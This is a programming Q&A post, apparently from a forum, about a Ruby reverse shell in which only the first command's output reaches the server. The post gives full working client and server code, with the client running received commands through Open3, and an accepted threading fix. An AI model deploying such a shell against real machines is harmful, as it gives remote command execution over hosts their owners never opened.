# Reverse Shell - How to make the server print multiple messages sent to the client

Tags: ruby, reverse

My reverse shell will only print the output of "ls" command the first time, how can I make it print, in the server, as many times as I want to?

```
require 'socket'
require 'open3'

def createClient(hostname, port)

  s = TCPSocket.new hostname, port

    while line = s.gets
      if line == "exit"
        s.close
      end
      stdin, stdout, stderr, wait_thr = Open3.popen3(line)
      s.puts("#{stdout.read}")
    end
end

createClient("127.0.0.1", 9090)


require 'socket'

 def createServer(hostname, port)

   server = TCPServer.new(hostname, port)
   client = server.accept


   loop do

     message = gets.chomp
     if message == "exit"
       break
     end
     client.puts(message)
     while line = client.gets
       puts line
     end
   end

   client.close

end

createServer("127.0.0.1", 9090)
```

I was expecting the server to print all of the ls commands processed by the client, but it only printed the first one.

Comment: Not sure if this matters but the string sent to popen3 is missing the trailing newline.

Answer (score 0, accepted):

the `client.gets` keeps listening to the socket until it is closed. so it hangs there.

you can try to open a tread to listen to the socket. The main loop listens to stdin and sends msg to the socket. like this:

```rb
   Thread.new do
     while line = client.gets 
        puts line
     end
   end

   loop do
     message = gets.chomp
     if message == "exit"
       break
     end
     client.puts(message)
   end

   client.close
```